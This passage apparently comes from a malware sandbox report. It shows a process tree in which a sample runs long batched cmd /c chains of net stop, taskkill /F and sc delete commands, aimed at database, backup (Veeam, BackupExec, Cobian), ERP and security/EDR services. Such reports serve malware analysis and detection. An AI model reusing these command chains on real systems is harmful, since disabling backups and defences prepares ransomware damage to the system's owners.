      net stop JWEM3DBAUTORun
      4⤵
      PID:2252
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWEM3DBAUTORun
        5⤵
        
        PID:1964
  - - C:\Windows\SysWOW64\net.exe
      net stop JWRinfoClientService
      4⤵
      PID:1628
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWRinfoClientService
        5⤵
        
        PID:3200
  - - C:\Windows\SysWOW64\net.exe
      net stop JWService
      4⤵
      PID:3660
  - - C:\Windows\SysWOW64\net.exe
      net stop Service2
      4⤵
      PID:1664
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Service2
        5⤵
        
        PID:2072
  - - C:\Windows\SysWOW64\net.exe
      net stop RapidRecoveryAgent
      4⤵
      PID:1716
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RapidRecoveryAgent
        5⤵
        
        PID:908
  - - C:\Windows\SysWOW64\net.exe
      net stop FirebirdServerDefaultInstance
      4⤵
      PID:4984
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
        5⤵
        
        PID:3100
  - - C:\Windows\SysWOW64\net.exe
      net stop AdobeARMservice
      4⤵
      PID:4488
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AdobeARMservice
        5⤵
        
        PID:1172
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCatalogSvc
      4⤵
      PID:5044
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCatalogSvc
        5⤵
        
        PID:4720
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeanBackupSvc
      4⤵
      PID:2472
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeanBackupSvc
        5⤵
        
        PID:1584
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamTransportSvc
      4⤵
      PID:4208
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc
        5⤵
        
        PID:2432
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdAppService1300
      4⤵
      PID:1604
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdAppService1300
        5⤵
        
        PID:396
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdTaskService1300
      4⤵
      PID:3752
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1300
        5⤵
        
        PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
    3⤵
    PID:4432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pg_ctl.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5012
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM rcrelay.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SogouImeBroker.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5076
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CCenter.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1356
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ScanFrm.exe /F
      4⤵
      PID:2572
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mysqltransport
        5⤵
        
        PID:2100
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM d_manage.exe /F
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RsTray.exe /F
      4⤵
      PID:3660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wampmanager.exe /F
      4⤵
      Kills process with taskkill
      PID:3940
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RavTray.exe /F
      4⤵
      PID:3100
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mssearch.exe /F
      4⤵
      PID:384
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlmangr.exe /F
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM msftesql.exe /F
      4⤵
      PID:4972
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SyncBaseSvr.exe /F
      4⤵
      Kills process with taskkill
      PID:928
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oracle.exe /F
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TNSLSNR.exe /F
      4⤵
      PID:1708
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SyncBaseConsole.exe /F
      4⤵
      Kills process with taskkill
      PID:3880
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM aspnet_state.exe /F
      4⤵
      PID:3092
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoBackUpEx.exe /F
      4⤵
      PID:4484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM redis-server.exe /F
      4⤵
      Kills process with taskkill
      PID:648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MySQLNotifier.exe /F
      4⤵
      PID:4212
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oravssw.exe /F
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fppdis5.exe /F
      4⤵
      PID:2900
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM His6Service.exe /F
      4⤵
      PID:4788
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM dinotify.exe /F
      4⤵
      PID:3712
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM JhTask.exe /F
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Executer.exe /F
      4⤵
      Kills process with taskkill
      PID:4240
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AllPassCBHost.exe /F
      4⤵
      PID:1180
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ap_nginx.exe /F
      4⤵
      PID:4864
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AndroidServer.exe /F
      4⤵
      PID:4248
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XT.exe /F
      4⤵
      PID:5056
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XTService.exe /F
      4⤵
      PID:2204
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AllPassMCService.exe /F
      4⤵
      PID:3140
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IMEDICTUPDATE.exe /F
      4⤵
      Kills process with taskkill
      PID:3088
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM FlashHelperService.exe /F
      4⤵
      Kills process with taskkill
      PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
    3⤵
    PID:988
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSCRMAsyncService
      4⤵
      Launches sc.exe
      PID:4492
  - - C:\Windows\SysWOW64\sc.exe
      sc delete REPLICA
      4⤵
      PID:860
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCATS
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCAVMCU
      4⤵
      PID:4048
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RtcQms
      4⤵
      PID:2184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCMEETINGMCU
      4⤵
      Launches sc.exe
      PID:3140
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCIMMCU
      4⤵
      PID:3224
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCDATAMCU
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCCDR
      4⤵
      PID:4360
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectEventService16
      4⤵
      PID:1248
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectQueueService16
      4⤵
      PID:744
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPAdminV4
      4⤵
      PID:2964
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPSearchHostController
      4⤵
      PID:1244
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPTimerV4
      4⤵
      PID:4312
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPTraceV4
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OSearch16
      4⤵
      PID:2528
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectCalcService16
      4⤵
      PID:756
  - - C:\Windows\SysWOW64\sc.exe
      sc delete c2wts
      4⤵
      Launches sc.exe
      PID:2236
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AppFabricCachingService
      4⤵
      PID:1048
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ADWS
      4⤵
      PID:744
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MotionBoard57
      4⤵
      PID:5052
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MotionBoardRCService57
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vsvnjobsvc
      4⤵
      PID:4456
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VisualSVNServer
      4⤵
      Launches sc.exe
      PID:1528
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FlexNet Licensing Service 64"
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BestSyncSvc
      4⤵
      PID:3168
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LPManager
      4⤵
      PID:5060
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MediatekRegistryWriter
      4⤵
      PID:1244
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RaAutoInstSrv_RT2870
      4⤵
      Launches sc.exe
      PID:1128
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup10
      4⤵
      Launches sc.exe
      PID:4356
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLANYs_sem5
      4⤵
      PID:2572
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CASLicenceServer
      4⤵
      PID:4444
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLService
      4⤵
      PID:3880
  - - C:\Windows\SysWOW64\sc.exe
      sc delete semwebsrv
      4⤵
      Launches sc.exe
      PID:2184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TbossSystem
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ErpEnvSvc
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.DispatchService
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.UpdateService
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Config.WindowsService
      4⤵
      PID:5012
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.DataCenterService
      4⤵
      PID:4496
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.SchedulingService
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Setup.InstallService
      4⤵
      PID:4492
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MysoftUpdate
      4⤵
      PID:3340
  - - C:\Windows\SysWOW64\sc.exe
      sc delete edr_monitor
      4⤵
      PID:2116
  - - C:\Windows\SysWOW64\sc.exe
      sc delete abs_deployer
      4⤵
      Launches sc.exe
      PID:3364
  - - C:\Windows\SysWOW64\sc.exe
      sc delete savsvc
      4⤵
      PID:1856
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ShareBoxMonitorService
      4⤵
      PID:1260
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
    3⤵
    PID:1948
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExec.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1260
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Att.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2252
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mdm.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4912
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExecManagementService.exe /F
      4⤵
      PID:4484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bengine.exe /F
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM benetns.exe /F
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beserver.exe /F
      4⤵
      PID:3392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pvlsvr.exe /F
      4⤵
      Kills process with taskkill
      PID:4608
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bedbg.exe /F
      4⤵
      PID:484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:1432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:4920
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RemoteAssistProcess.exe /F
      4⤵
      PID:1048
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarMoniService.exe /F
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoodGameSrv.exe /F
      4⤵
      PID:868
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarCMService.exe /F
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TsService.exe /F
      4⤵
      PID:2932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoodGame.exe /F
      4⤵
      PID:1400
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarServerView.exe /F
      4⤵
      PID:368
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IcafeServicesTray.exe /F
      4⤵
      PID:4712
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BsAgent_0.exe /F
      4⤵
      PID:3832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ControlServer.exe /F
      4⤵
      PID:2384
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DisklessServer.exe /F
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DumpServer.exe /F
      4⤵
      Kills process with taskkill
      PID:396
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM NetDiskServer.exe /F
      4⤵
      Kills process with taskkill
      PID:384
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM PersonUDisk.exe /F
      4⤵
      Kills process with taskkill
      PID:1836
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM service_agent.exe /F
      4⤵
      PID:1932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SoftMemory.exe /F
      4⤵
      PID:3852
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarServer.exe /F
      4⤵
      PID:1576
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RtkNGUI64.exe /F
      4⤵
      PID:4964
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Serv-U-Tray.exe /F
      4⤵
      PID:4892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QQPCSoftTrayTips.exe /F
      4⤵
      PID:3960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SohuNews.exe /F
      4⤵
      PID:3832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Serv-U.exe /F
      4⤵
      PID:1820
